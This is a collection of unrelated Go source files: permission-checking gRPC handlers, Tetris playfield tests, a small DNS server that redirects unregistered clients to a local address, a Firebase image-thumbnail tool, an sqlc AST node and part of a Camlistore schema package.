func (plugin *GrpcPlugin) handleAppListResourceEvents(ctx context.Context, req *http.Request) *mw.HttpResponse {
appReq := new(application.ApplicationResourceEventsQuery)
if err := plugin.readRequestBody(ctx, req, appReq); err != nil {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
}
return plugin.handleAppCommon(ctx, *appReq.Name, iam.ProjectEdit)
}
// handleAppGetApplicationSyncWindows handle application sync windows
func (plugin *GrpcPlugin) handleAppGetApplicationSyncWindows(ctx context.Context, req *http.Request) *mw.HttpResponse {
appReq := new(application.ApplicationSyncWindowsQuery)
if err := plugin.readRequestBody(ctx, req, appReq); err != nil {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
}
return plugin.handleAppCommon(ctx, *appReq.Name, iam.ProjectEdit)
}
// handleAppRevisionMetadata handle application revision metadata
func (plugin *GrpcPlugin) handleAppRevisionMetadata(ctx context.Context, req *http.Request) *mw.HttpResponse {
appReq := new(application.RevisionMetadataQuery)
if err := plugin.readRequestBody(ctx, req, appReq); err != nil {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
}
return plugin.handleAppCommon(ctx, *appReq.Name, iam.ProjectEdit)
}
// handleAppGetManifests handle application get manifests
func (plugin *GrpcPlugin) handleAppGetManifests(ctx context.Context, req *http.Request) *mw.HttpResponse {
appReq := new(application.ApplicationManifestQuery)
if err := plugin.readRequestBody(ctx, req, appReq); err != nil {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
}
return plugin.handleAppCommon(ctx, *appReq.Name, iam.ProjectEdit)
}
// handleAppManagedResources handle application managed resources
func (plugin *GrpcPlugin) handleAppManagedResources(ctx context.Context, req *http.Request) *mw.HttpResponse {
appReq := new(application.ResourcesQuery)
if err := plugin.readRequestBody(ctx, req, appReq); err != nil {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
}
return plugin.handleAppCommon(ctx, *appReq.ApplicationName, iam.ProjectEdit)
}
// handleAppResourceTree handle application resource tree
func (plugin *GrpcPlugin) handleAppResourceTree(ctx context.Context, req *http.Request) *mw.HttpResponse {
appReq := new(application.ResourcesQuery)
if err := plugin.readRequestBody(ctx, req, appReq); err != nil {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
}
return plugin.handleAppCommon(ctx, *appReq.ApplicationName, iam.ProjectEdit)
}
// handleAppRollback handle application rollback
func (plugin *GrpcPlugin) handleAppRollback(ctx context.Context, req *http.Request) *mw.HttpResponse {
appReq := new(application.ApplicationRollbackRequest)
if err := plugin.readRequestBody(ctx, req, appReq); err != nil {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
}
return plugin.handleAppCommon(ctx, *appReq.Name, iam.ProjectEdit)
}
// handleAppTerminateOperation handle application termination operator
func (plugin *GrpcPlugin) handleAppTerminateOperation(ctx context.Context, req *http.Request) *mw.HttpResponse {
appReq := new(application.OperationTerminateRequest)
if err := plugin.readRequestBody(ctx, req, appReq); err != nil {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
}
return plugin.handleAppCommon(ctx, *appReq.Name, iam.ProjectEdit)
}
// handleAppGetResource handle application get resource
func (plugin *GrpcPlugin) handleAppGetResource(ctx context.Context, req *http.Request) *mw.HttpResponse {
appReq := new(application.ApplicationResourceRequest)
if err := plugin.readRequestBody(ctx, req, appReq); err != nil {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
}
return plugin.handleAppCommon(ctx, *appReq.Name, iam.ProjectEdit)
}
// handleAppPatchResource handle application patch resource
func (plugin *GrpcPlugin) handleAppPatchResource(ctx context.Context, req *http.Request) *mw.HttpResponse {
appReq := new(application.ApplicationResourcePatchRequest)
if err := plugin.readRequestBody(ctx, req, appReq); err != nil {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
}
return plugin.handleAppCommon(ctx, *appReq.Name, iam.ProjectEdit)
}
// handleAppListResourceActions handle application list resource actions
func (plugin *GrpcPlugin) handleAppListResourceActions(ctx context.Context, req *http.Request) *mw.HttpResponse {
appReq := new(application.ApplicationResourceRequest)
if err := plugin.readRequestBody(ctx, req, appReq); err != nil {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
}
return plugin.handleAppCommon(ctx, *appReq.Name, iam.ProjectEdit)
}
// handleAppRunResourceAction handle application run resource action
func (plugin *GrpcPlugin) handleAppRunResourceAction(ctx context.Context, req *http.Request) *mw.HttpResponse {
appReq := new(application.ResourceActionRunRequest)
if err := plugin.readRequestBody(ctx, req, appReq); err != nil {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
}
return plugin.handleAppCommon(ctx, *appReq.Name, iam.ProjectEdit)
}
// handleAppDeleteResource handle application delete resource
func (plugin *GrpcPlugin) handleAppDeleteResource(ctx context.Context, req *http.Request) *mw.HttpResponse {
appReq := new(application.ApplicationResourceDeleteRequest)
if err := plugin.readRequestBody(ctx, req, appReq); err != nil {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
}
return plugin.handleAppCommon(ctx, *appReq.Name, iam.ProjectEdit)
}
// handleAppPodLogs handle application pod logs
func (plugin *GrpcPlugin) handleAppPodLogs(ctx context.Context, req *http.Request) *mw.HttpResponse {
appReq := new(application.ApplicationPodLogsQuery)
if err := plugin.readRequestBody(ctx, req, appReq); err != nil {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
}
return plugin.handleAppCommon(ctx, *appReq.Name, iam.ProjectEdit)
}
// handleAppListLinks handle application list links
func (plugin *GrpcPlugin) handleAppListLinks(ctx context.Context, req *http.Request) *mw.HttpResponse {
appReq := new(application.ListAppLinksRequest)
if err := plugin.readRequestBody(ctx, req, appReq); err != nil {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
}
return plugin.handleAppCommon(ctx, *appReq.Name, iam.ProjectEdit)
}
// handleAppListResourceLinks handle application list resource links
func (plugin *GrpcPlugin) handleAppListResourceLinks(ctx context.Context, req *http.Request) *mw.HttpResponse {
appReq := new(application.ApplicationResourceRequest)
if err := plugin.readRequestBody(ctx, req, appReq); err != nil {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
}
return plugin.handleAppCommon(ctx, *appReq.Name, iam.ProjectEdit)
}
// handleAppCommon handle application common handler
func (plugin *GrpcPlugin) handleAppCommon(ctx context.Context, appName string, actionID iam.ActionID) *mw.HttpResponse {
_, statusCode, err := plugin.middleware.CheckApplicationPermission(ctx, appName, actionID)
if statusCode != http.StatusOK {
return mw.ReturnGRPCErrorResponse(statusCode,
errors.Wrapf(err, "check application '%s' permission failed", appName))
}
return nil
}
|
package main
import (
"testing"
"github.com/stretchr/testify/assert"
)
func TestPlayfieldCap(t *testing.T) {
pf := NewPlayfield(16, 10)
r, c := pf.Cap()
assert.Equal(t, r, 16)
assert.Equal(t, c, 10)
}
func TestPlayfieldSpawn(t *testing.T) {
pf := NewPlayfield(16, 10)
err := pf.Spawn(func(l int) int { return 0 })
assert.NoError(t, err)
assert.IsType(t, &ITetromino{}, pf.current.obj)
}
func TestPlayfieldSpawnUpperBound(t *testing.T) {
pf := NewPlayfield(16, 10)
var ll spawner = func(l int) int {
return l - 1
}
err := pf.Spawn(ll)
assert.NoError(t, err)
assert.IsType(t, <etromino{}, pf.current.obj)
}
func TestPlayfieldSpawnOutOfBounds(t *testing.T) {
pf := NewPlayfield(16, 10)
err := pf.Spawn(func(l int) int { return 100 })
assert.EqualError(t, err, "value out of bounds")
assert.Nil(t, pf.current)
}
func TestPlayfieldSpawnOutOfBoundsNegative(t *testing.T) {
pf := NewPlayfield(16, 10)
err := pf.Spawn(func(l int) int { return -1 })
assert.EqualError(t, err, "value out of bounds")
assert.Nil(t, pf.current)
}
func TestPlayfieldMoveDown(t *testing.T) {
pf := NewPlayfield(16, 10)
err := pf.Spawn(func(l int) int { return 0 })
assert.NoError(t, err)
pf.Move(0, 1)
assert.Equal(t, 1, pf.current.y)
}
func TestPlayfieldMoveDownOutOfBounds(t *testing.T) {
var err error
pf := NewPlayfield(16, 10)
err = pf.Spawn(func(l int) int { return 0 })
assert.NoError(t, err)
prevY := pf.current.y
err = pf.Move(0, 32)
assert.EqualError(t, err, "value out of bounds")
assert.Equal(t, prevY, pf.current.y)
}
|
package chain
import "testing"
func TestChain(t *testing.T) {
v1 := NewTeacher()
v2 := NewHeadermaster()
v1.SetNext(v2)
v := v1
v.Exec(1)
v.Exec(3)
v.Exec(2)
v.Exec(4)
}
|
package dns
import (
"flag"
"fmt"
"github.com/miekg/dns"
"net"
"os"
"strconv"
"strings"
"sync"
"time"
)
var IpToDNS = make(map[string]string) // key = IP, value = dnsname
var allowed_ips = make([]string, 0)
var Mutex = sync.Mutex{}
func StartDNSServer(channel chan string) {
fmt.Println("Starting DNS Server...")
server := &dns.Server{Addr: ":53", Net: "udp"}
server.TsigSecret = map[string]string{"axfr.": "so6ZGir4GPAqINNh9U5c3A=="}
go checkForKnownIp(channel)
go server.ListenAndServe()
fmt.Println("DNS server started!")
dns.HandleFunc(".", handleRequest)
}
func checkForKnownIp(channel chan string) {
for {
ip := <-channel
if !contains(allowed_ips, ip) {
fmt.Printf("[%s] REGISTERD NEW CLIENT\n" , ip)
allowed_ips = append(allowed_ips, ip)
}
}
}
func contains(s []string, e string) bool {
for _, a := range s {
if a == e {
return true
}
}
return false
}
var (
cpuprofile = flag.String("cpuprofile", "", "write cpu profile to file")
printf = flag.Bool("print", false, "print replies")
compress = flag.Bool("compress", false, "compress replies")
tsig = flag.String("tsig", "", "use MD5 hmac tsig: keyname:base64")
soreuseport = flag.Int("soreuseport", 0, "use SO_REUSE_PORT")
cpu = flag.Int("cpu", 0, "number of cpu to use")
)
func handleRequest(w dns.ResponseWriter, r *dns.Msg) {
var (
v4 bool
rr dns.RR
str string
a net.IP
)
m := new(dns.Msg)
m.SetReply(r)
m.Compress = *compress
if ip, ok := w.RemoteAddr().(*net.UDPAddr); ok {
str = "Port: " + strconv.Itoa(ip.Port) + " (udp)"
a = ip.IP
v4 = a.To4() != nil
}
if ip, ok := w.RemoteAddr().(*net.TCPAddr); ok {
str = "Port: " + strconv.Itoa(ip.Port) + " (tcp)"
a = ip.IP
v4 = a.To4() != nil
}
remoteIP := strings.Split(w.RemoteAddr().String(), ":")[0]
ip := net.IPv4(192, 168, 99, 1)
if contains(allowed_ips, remoteIP) {
foundCachedIp := false
Mutex.Lock()
for cachedIp, cachedDnsName := range IpToDNS{
if r.Question[0].Name == cachedDnsName{
ip = net.ParseIP(cachedIp)
//fmt.Printf("Found cached IP %s for DNS-Request %s\n", r.Question[0].Name, ip.String())
foundCachedIp = true
break
}
}
Mutex.Unlock()
if !foundCachedIp {
ips, err := net.LookupIP(r.Question[0].Name)
if err != nil {
fmt.Fprintf(os.Stderr, "Could not get IPs: %v\n", err)
//os.Exit(1)
}
ip = nil
for _, iprunner := range ips {
if iprunner.To4() != nil {
ip = iprunner.To4()
break
}
}
if ip == nil && len(ips) > 0 {
ip = ips[0]
}
}
}
if ip != nil {
//fmt.Printf("[%s] DNS-Request: %s | Answer: %s\n", remoteIP, r.Question[0].Name, ip.String())
for _, allowed_ip := range allowed_ips {
if allowed_ip == remoteIP {
addDnsToIp(r.Question[0].Name, ip.String())
}
}
}
if v4 {
rr = &dns.A{
// Hdr: dns.RR_Header{Name: dom, Rrtype: dns.TypeA, Class: dns.ClassINET, Ttl: 0},
Hdr: dns.RR_Header{Name: r.Question[0].Name, Rrtype: dns.TypeA, Class: dns.ClassINET, Ttl: 0},
//A: a.To4(),
A: ip,
}
} else {
rr = &dns.AAAA{
Hdr: dns.RR_Header{Name: r.Question[0].Name, Rrtype: dns.TypeAAAA, Class: dns.ClassINET, Ttl: 0},
AAAA: ip,
}
}
t := &dns.TXT{
Hdr: dns.RR_Header{Name: r.Question[0].Name, Rrtype: dns.TypeTXT, Class: dns.ClassINET, Ttl: 0},
Txt: []string{str},
}
switch r.Question[0].Qtype {
case dns.TypeTXT:
m.Answer = append(m.Answer, t)
m.Extra = append(m.Extra, rr)
default:
fallthrough
case dns.TypeAAAA, dns.TypeA:
m.Answer = append(m.Answer, rr)
m.Extra = append(m.Extra, t)
case dns.TypeAXFR, dns.TypeIXFR:
c := make(chan *dns.Envelope)
tr := new(dns.Transfer)
defer close(c)
if err := tr.Out(w, r, c); err != nil {
return
}
//soa, _ := dns.NewRR(`whoami.miek.nl. 0 IN SOA linode.atoom.net. miek.miek.nl. 2009032802 21600 7200 604800 3600`)
//c <- &dns.Envelope{RR: []dns.RR{soa, t, rr, soa}}
w.Hijack()
// w.Close() // Client closes connection
return
}
if r.IsTsig() != nil {
if w.TsigStatus() == nil {
m.SetTsig(r.Extra[len(r.Extra)-1].(*dns.TSIG).Hdr.Name, dns.HmacMD5, 300, time.Now().Unix())
} else {
println("Status", w.TsigStatus().Error())
}
}
w.WriteMsg(m)
}
func addDnsToIp(dnsname string, ip string) {
Mutex.Lock()
IpToDNS[ip] = dnsname
//fmt.Println(IpToDNS)
Mutex.Unlock()
}
|
package main
import (
"bytes"
"context"
"encoding/json"
"fmt"
"log"
"os"
"strconv"
"strings"
"time"
"cloud.google.com/go/firestore"
cstorage "cloud.google.com/go/storage"
gstorage "cloud.google.com/go/storage"
firebase "firebase.google.com/go"
Auth "firebase.google.com/go/auth"
"firebase.google.com/go/db"
firestorage "firebase.google.com/go/storage"
"github.com/disintegration/imaging"
"github.com/modeckrus/firebase/firebasestorage"
"google.golang.org/api/option"
)
var client *db.Client
var fstore *firestore.Client
var storage *firestorage.Client
var bucket *gstorage.BucketHandle
var auth *Auth.Client
var cstor *cstorage.Client
func init() {
ctx := context.Background()
conf := &firebase.Config{
ProjectID: "modeckchat",
DatabaseURL: "https://modeckchat.firebaseio.com/",
StorageBucket: "modeckchat.appspot.com",
}
opt := option.WithCredentialsFile("./secured/adminsdk.json") //Specify this file by ur adminsdk, u can find it in settigns of ur firebase project
app, err := firebase.NewApp(ctx, conf, opt)
if err != nil {
log.Fatal(err)
}
client, err = app.Database(ctx)
if err != nil {
log.Fatal(err)
}
fstore, err = app.Firestore(ctx)
if err != nil {
log.Fatal(err)
}
auth, err = app.Auth(ctx)
if err != nil {
log.Fatal(err)
}
cstor, err = cstorage.NewClient(ctx, opt)
if err != nil {
log.Fatal(err)
}
bucket = cstor.Bucket("modeckchat.appspot.com")
}
type ThubHand struct {
Path string `json:"path"`
Sizes []struct {
Height string `json:"height"`
Width int `json:"width"`
} `json:"sizes"`
}
func main() {
fmt.Println(os.Getenv("GOOGLE_CLOUD_PROJECT"))
var sizes []Size
sizes = []Size{
Size{
Width: 100,
Height: 100,
},
Size{
Width: 200,
Height: 200,
},
Size{
Width: 300,
Height: 300,
},
Size{
Width: 500,
Height: 500,
},
Size{
Width: 50,
Height: 50,
},
Size{
Width: 20,
Height: 20,
},
}
Thubnails(cstor, bucket, "test/avatar.jpg", sizes)
}
/*
ctx := context.Background()
doc := fstore.Collection("service").Doc("service").Collection("thubnail").Doc("x9f09yczE0fGiNyehsul")
snap, err := doc.Get(ctx)
if err != nil {
log.Fatal(err)
}
var thub ThubHand
err = snap.DataTo(&thub)
if err != nil {
log.Fatal(err)
}
fstore.Collection("service").Doc("service").Collection("thubnail").Add(ctx, thub)
fmt.Println(thub)
b, err := firebasestorage.Read(cstor, bucket, "david.jpg")
io := bytes.NewReader(b)
src, err := imaging.Decode(io)
err = imaging.Save(src, "images/david.jpg")
if err != nil {
log.Fatal(err)
}
*/
/*
var sizes [] Size
sizes = [] Size{
Size{
Width: 100,
Height: 100,
},
Size{
Width: 200,
Height: 200,
},
Size{
Width: 300,
Height: 300,
},
Size{
Width: 500,
Height: 500,
},
}
thub := Thubnail{
Path: "avatars/testavatar/download.jpeg",
Sizes: sizes,
Ready: false,
}
js, err := json.Marshal(thub)
if err != nil {
log.Fatal(err)
}
fmt.Println(string(js))
ctx := context.Background()
fstore.Collection("service").Doc("service").Collection("thubnail").Add(ctx, thub)
*/
//Size size
type Size struct {
Width int
Height int
}
// FirestoreEvent is the payload of a Firestore event.
type FirestoreEvent struct {
OldValue FirestoreValue `json:"oldValue"`
Value FirestoreValue `json:"value"`
UpdateMask struct {
FieldPaths []string `json:"fieldPaths"`
} `json:"updateMask"`
}
// FirestoreValue holds Firestore fields.
type FirestoreValue struct {
CreateTime time.Time `json:"createTime"`
// Fields is the data for this value. The type depends on the format of your
// database. Log an interface{} value and inspect the result to see a JSON
// representation of your database fields.
Fields ThubHandStruct `json:"fields"`
Name string `json:"name"`
UpdateTime time.Time `json:"updateTime"`
}
//ThubHandStruct event
type ThubHandStruct struct {
Path struct {
StringValue string `json:"stringValue"`
} `json:"Path"`
Ready struct {
BooleanValue bool `json:"booleanValue"`
} `json:"Ready"`
Sizes struct {
ArrayValue struct {
Values []struct {
MapValue struct {
Fields struct {
Height struct {
IntegerValue string `json:"integerValue"`
} `json:"Height"`
Width struct {
IntegerValue string `json:"integerValue"`
} `json:"Width"`
} `json:"fields"`
} `json:"mapValue"`
} `json:"values"`
} `json:"arrayValue"`
} `json:"Sizes"`
}
//Thubnail reference of firestore
type Thubnail struct {
Path string `json:"path"`
Sizes []Size `json:"sizes"`
Ready bool `json:"ready"`
}
func convertToThubStrcut(hand ThubHandStruct) (Thubnail, error) {
var thub Thubnail
thub.Path = hand.Path.StringValue
for _, size := range hand.Sizes.ArrayValue.Values {
h, err := strconv.Atoi(size.MapValue.Fields.Height.IntegerValue)
if err != nil {
return thub, err
}
w, err := strconv.Atoi(size.MapValue.Fields.Width.IntegerValue)
if err != nil {
return thub, err
}
thub.Sizes = append(thub.Sizes, Size{
Height: h,
Width: w,
})
}
thub.Ready = false
return thub, nil
}
//ThumbHandler handle the event and convert it
func ThumbHandler(ctx context.Context, e FirestoreEvent) error {
fullPath := strings.Split(e.Value.Name, "/documents/")[1]
pathParts := strings.Split(fullPath, "/")
log.Println(pathParts)
js, err := json.Marshal(e.Value.Fields)
if err != nil {
log.Fatal(err)
}
log.Printf("event fields: %v", string(js))
thub, err := convertToThubStrcut(e.Value.Fields)
if err != nil {
log.Fatal(err)
return err
}
Thubnails(cstor, bucket, thub.Path, thub.Sizes)
thub.Ready = true
log.Printf("Thub is: %v", thub)
fstore.Collection("service").Doc("service").Collection("thubnail").Doc(pathParts[len(pathParts)-1]).Set(
ctx,
thub,
)
return nil
}
//Thubnails make thunail of images in firebase storage
func Thubnails(cstor *gstorage.Client, bucket *gstorage.BucketHandle, filename string, sizes []Size) {
b, err := firebasestorage.Read(cstor, bucket, filename)
if err != nil {
log.Fatal(err)
}
io := bytes.NewReader(b)
src, err := imaging.Decode(io)
path := strings.Split(filename, "/")
f := path[len(path)-1] //Filename
path = path[:len(path)-1]
p := strings.Join(path, "/") //Path to file
fmt.Printf("%v/%v", p, f)
for _, size := range sizes {
img := imaging.Thumbnail(src, size.Width, size.Height, imaging.Lanczos)
/*
err = imaging.Save(img, fmt.Sprintf("@thubnail_%vX%v_%v", size.Width, size.Height, filename))
if err != nil {
log.Fatal(err)
}
*/
filetype, err := imaging.FormatFromFilename(filename)
if err != nil {
log.Fatal(err)
}
var buf bytes.Buffer
imaging.Encode(&buf, img, filetype)
//f, err := os.Open(fmt.Sprintf("@thub_%vX%v%v", size.Width, size.Height, filename))
err = firebasestorage.Write(cstor, bucket, fmt.Sprintf("%v/@thub_%vX%v_%v", p, size.Width, size.Height, f), &buf)
if err != nil {
log.Println(err)
}
//imaging.Encode( )
}
}
|
package pg
import (
"github.com/kyleconroy/sqlc/internal/sql/ast"
)
type DefElem struct {
Defnamespace *string
Defname *string
Arg ast.Node
Defaction DefElemAction
Location int
}
func (n *DefElem) Pos() int {
return n.Location
}
|
/*
Copyright 2011 Google Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package schema
import (
"bufio"
"bytes"
"crypto/sha1"
"fmt"
"io"
"json"
"log"
"os"
"rand"
"strconv"
"strings"
"sync"
"syscall"
"time"
"camli/blobref"
)
var _ = log.Printf
var ErrNoCamliVersion = os.NewError("schema: no camliVersion key in map")
var ErrUnimplemented = os.NewError("schema: unimplemented")
type StatHasher interface {
Lstat(fileName string) (*os.FileInfo, os.Error)
Hash(fileName string) (*blobref.BlobRef, os.Error)
}
type File interface {
Close() os.Error
Skip(skipBytes uint64) uint64
Read(p []byte) (int, os.Error)
}
// Directory is a read-only interface to a "directory" schema blob.
type Directory interface {
// Readdir reads the contents of the directory associated with dr
// and returns an array of up to n DirectoryEntries structures.
// Subsequent calls on the same file will yield further
// DirectoryEntries.
// If n > 0, Readdir returns at most n DirectoryEntry structures. In
// this case, if Readdir returns an empty slice, it will return
// a non-nil error explaining why. At the end of a directory,
// the error is os.EOF.
// If n <= 0, Readdir returns all the DirectoryEntries from the
// directory in a single slice. In this case, if Readdir succeeds
// (reads all the way to the end of the directory), it returns the
// slice and a nil os.Error. If it encounters an error before the
// end of the directory, Readdir returns the DirectoryEntry read
// until that point and a non-nil error.
Readdir(count int) ([]DirectoryEntry, os.Error)
}
type Symlink interface {
// .. TODO
}
// DirectoryEntry is a read-only interface to an entry in a (static)
// directory.
type DirectoryEntry interface {
// CamliType returns the schema blob's "camliType" field.
// This may be "file", "directory", "symlink", or other more
// obscure types added in the future.
CamliType() string
FileName() string
BlobRef() *blobref.BlobRef
File() (File, os.Error) // if camliType is "file"
Directory() (Directory, os.Error) // if camliType is "directory"
Symlink() (Symlink, os.Error) // if camliType is "symlink"
}
// dirEntry is the default implementation of DirectoryEntry
type dirEntry struct {
ss Superset
fetcher blobref.SeekFetcher
fr *FileReader // or nil if not a file
dr *DirReader // or nil if not a directory
}
func (de *dirEntry) CamliType() string {
return de.ss.Type
}
func (de *dirEntry) FileName() string {
return de.ss.FileNameString()
}
func (de *dirEntry) BlobRef() *blobref.BlobRef {
return de.ss.BlobRef
}
func (de *dirEntry) File() (File, os.Error) {
if de.fr == nil {
if de.ss.Type != "file" {
return nil, fmt.Errorf("DirectoryEntry is camliType %q, not %q", de.ss.Type, "file")
}
fr, err := NewFileReader(de.fetcher, de.ss.BlobRef)
if err != nil {
return nil, err
}
de.fr = fr
}
return de.fr, nil
}
func (de *dirEntry) Directory() (Directory, os.Error) {
if de.dr == nil {
if de.ss.Type != "directory" {
return nil, fmt.Errorf("DirectoryEntry is camliType %q, not %q", de.ss.Type, "directory")
}
dr, err := NewDirReader(de.fetcher, de.ss.BlobRef)
if err != nil {
return nil, err
}
de.dr = dr
}
return de.dr, nil
}
func (de *dirEntry) Symlink() (Symlink, os.Error) {
return 0, os.NewError("TODO: Symlink not implemented")
}
// NewDirectoryEntry takes a Superset and returns a DirectoryEntry if
// the Supserset is valid and represents an entry in a directory. It
// must by of type "file", "directory", or "symlink".
// TODO(mpl): symlink
// TODO: "fifo", "socket", "char", "block", probably. later.
func NewDirectoryEntry(fetcher blobref.SeekFetcher, ss *Superset) (DirectoryEntry, os.Error) {
if ss == nil {
return nil, os.NewError("ss was nil")
}
if ss.BlobRef == nil {
return nil, os.NewError("ss.BlobRef was nil")
}
switch ss.Type {
case "file", "directory", "symlink":
// Okay
default:
return nil, fmt.Errorf("invalid DirectoryEntry camliType of %q", ss.Type)
}
de := &dirEntry{ss: *ss, fetcher: fetcher} // defensive copy
return de, nil
}
// NewDirectoryEntryFromBlobRef takes a BlobRef and returns a
// DirectoryEntry if the BlobRef contains a type "file", "directory"
// or "symlink".
// TODO: "fifo", "socket", "char", "block", probably. later.
func NewDirectoryEntryFromBlobRef(fetcher blobref.SeekFetcher, blobRef *blobref.BlobRef) (DirectoryEntry, os.Error) {
ss := new(Superset)
err := ss.setFromBlobRef(fetcher, blobRef)
if err != nil {
return nil, fmt.Errorf("schema/filereader: can't fill Superset: %v\n", err)
}
return NewDirectoryEntry(fetcher, ss)
}
// Superset represents the superset of common camlistore JSON schema
// keys as a convenient json.Unmarshal target
type Superset struct {
BlobRef *blobref.BlobRef // Not in JSON, but included for
// those who want to set it.
Version int `json:"camliVersion"`
Type string `json:"camliType"`
Signer string `json:"camliSigner"`
Sig string `json:"camliSig"`
ClaimType string `json:"claimType"`
ClaimDate string `json:"claimDate"`
Permanode string `json:"permaNode"`
Attribute string `json:"attribute"`
Value string `json:"value"`
// TODO: ditch both the FooBytes variants below. a string doesn't have to be UTF-8.
FileName string `json:"fileName"`
FileNameBytes []interface{} `json:"fileNameBytes"` // TODO: needs custom UnmarshalJSON?
SymlinkTarget string `json:"symlinkTarget"`
SymlinkTargetBytes []interface{} `json:"symlinkTargetBytes"` // TODO: needs custom UnmarshalJSON?
UnixPermission string `json:"unixPermission"`
UnixOwnerId int `json:"unixOwnerId"`
UnixOwner string `json:"unixOwner"`
UnixGroupId int `json:"unixGroupId"`
UnixGroup string `json:"unixGroup"`
UnixMtime string `json:"unixMtime"`
UnixCtime string `json:"unixCtime"`
UnixAtime string `json:"unixAtime"`
Parts []*BytesPart `json:"parts"`
Entries string `json:"entries"` // for directories, a blobref to a static-set
Members []string `json:"members"` // for static sets (for directory static-sets:
// blobrefs to child dirs/files)
}
type BytesPart struct {
// Required.
Size uint64 `json:"size"`
// At most one of:
BlobRef *blobref.BlobRef `json:"blobRef,omitempty"`
BytesRef *blobref.BlobRef `json:"bytesRef,omitempty"`
// Optional (default value is zero if unset anyway):
Offset uint64 `json:"offset,omitempty"`
}
func stringFromMixedArray(parts []interface{}) string {
buf := new(bytes.Buffer)
for _, part := range parts {
if s, ok := part.(string); ok {
buf.WriteString(s)
continue
}
if num, ok := part.(float64); ok {
buf.WriteByte(byte(num))
continue
}
}
return buf.String()
}
func (ss *Superset) SumPartsSize() (size uint64) {
for _, part := range ss.Parts {
size += uint64(part.Size)
}
return size
}
func (ss *Superset) SymlinkTargetString() string {
if ss.SymlinkTarget != "" {
return ss.SymlinkTarget
}
return stringFromMixedArray(ss.SymlinkTargetBytes)
}
func (ss *Superset) FileNameString() string {
if ss.FileName != "" {
return ss.FileName
}
return stringFromMixedArray(ss.FileNameBytes)
}
func (ss *Superset) HasFilename(name string) bool {
return ss.FileNameString() == name
}
func (ss *Superset) UnixMode() (mode uint32) {
m64, err := strconv.Btoui64(ss.UnixPermission, 8)
if err == nil {
mode = mode | uint32(m64)
}
// TODO: add other types
switch ss.Type {
case "directory":
mode = mode | syscall.S_IFDIR
case "file":
mode = mode | syscall.S_IFREG
case "symlink":
mode = mode | syscall.S_IFLNK
}
return
}
var DefaultStatHasher = &defaultStatHasher{}
type defaultStatHasher struct{}
func (d *defaultStatHasher) Lstat(fileName string) (*os.FileInfo, os.Error) {
return os.Lstat(fileName)
}
func (d *defaultStatHasher) Hash(fileName string) (*blobref.BlobRef, os.Error) {
s1 := sha1.New()
file, err := os.Open(fileName)
if err != nil {
return nil, err
}
defer file.Close()
_, err = io.Copy(s1, file)
if err != nil {
return nil, err
}
return blobref.FromHash("sha1", s1), nil
}
type StaticSet struct {
l sync.Mutex
refs []*blobref.BlobRef
}
func (ss *StaticSet) Add(ref *blobref.BlobRef) {
ss.l.Lock()
defer ss.l.Unlock()
ss.refs = append(ss.refs, ref)
}
func newCamliMap(version int, ctype string) map[string]interface{} {
m := make(map[string]interface{})
m["camliVersion"] = version
m["camliType"] = ctype
return m
}
func NewUnsignedPermanode() map[string]interface{} {
m := newCamliMap(1, "permanode")
chars := make([]byte, 20)
// Don't need cryptographically secure random here, as this
// will be GPG signed anyway.
rnd := rand.New(rand.NewSource(time.Nanoseconds()))
for idx, _ := range chars {
chars[idx] = byte(32 + rnd.Intn(126-32))
}
m["random"] = string(chars)
return m
}
// Map returns a Camli map of camliType "static-set"
func (ss *StaticSet) Map() map[string]interface{} {
m := newCamliMap(1, "static-set")
ss.l.Lock()
defer ss.l.Unlock()
members := make([]string, 0, len(ss.refs))
if ss.refs != nil {
for _, ref := range ss.refs {
members = append(members, ref.String())
}
}
m["members"] = members
return m
}
func MapToCamliJson(m map[string]interface{}) (string, os.Error) {
version, hasVersion := m["camliVersion"]
if !hasVersion {
return "", ErrNoCamliVersion
}
m["camliVersion"] = 0, false
jsonBytes, err := json.MarshalIndent(m, "", " ")
if err != nil {
return "", err
}
m["camliVersion"] = version
buf := new(bytes.Buffer)
fmt.Fprintf(buf, "{\"camliVersion\": %v,\n", version)
buf.Write(jsonBytes[2:])
return string(buf.Bytes()), nil
}
func NewFileMap(fileName string) map[string]interface{} {
m := NewCommonFilenameMap(fileName)
m["camliType"] = "file"
return m
}
func NewCommonFilenameMap(fileName string) map[string]interface{} {
m := newCamliMap(1, "" /* no type yet */ )
if fileName != "" {
lastSlash := strings.LastIndex(fileName, "/")
baseName := fileName[lastSlash+1:]
if isValidUtf8(baseName) {
m["fileName"] = baseName
} else {
m["fileNameBytes"] = []uint8(baseName)
}
}
return m
}
func NewCommonFileMap(fileName string, fi *os.FileInfo) map[string]interface{} {
m := NewCommonFilenameMap(fileName)
// Common elements (from file-common.txt)
if !fi.IsSymlink() {
m["unixPermission"] = fmt.Sprintf("0%o", fi.Permission())
}
if fi.Uid != -1 {
m["unixOwnerId"] = fi.Uid
if user := getUserFromUid(fi.Uid); user != "" {
m["unixOwner"] = user
}
}
if fi.Gid != -1 {
m["unixGroupId"] = fi.Gid
if group := getGroupFromGid(fi.Gid); group != "" {
m["unixGroup"] = group
}
}
if mtime := fi.Mtime_ns; mtime != 0 {
m["unixMtime"] = RFC3339FromNanos(mtime)
}
// Include the ctime too, if it differs.
